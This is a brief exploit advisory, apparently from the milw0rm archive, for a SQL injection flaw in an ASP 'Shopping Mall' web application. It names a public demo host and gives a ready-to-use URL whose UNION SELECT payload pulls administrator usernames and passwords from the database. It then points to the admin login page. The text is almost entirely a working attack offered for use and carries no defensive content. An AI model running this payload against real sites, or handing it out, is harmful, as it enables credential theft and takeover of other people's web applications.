#By Osmanizim #Security Specialist #Contacts > :( www.osmanizim.com #Title: Shopping Mall <= SQL Injection Vulnerability. #Demo : http://freeasp.sepcity.com/shopmall/default.asp // Exploit --> http://localhost/shopmall/shpdetails.asp?ID=1 union select 0,1,2,username,password,5,6,7,8,9 from administrators // Admin --> http://localhost/shopmall/admlogin.asp? # milw0rm.com [2008-12-29]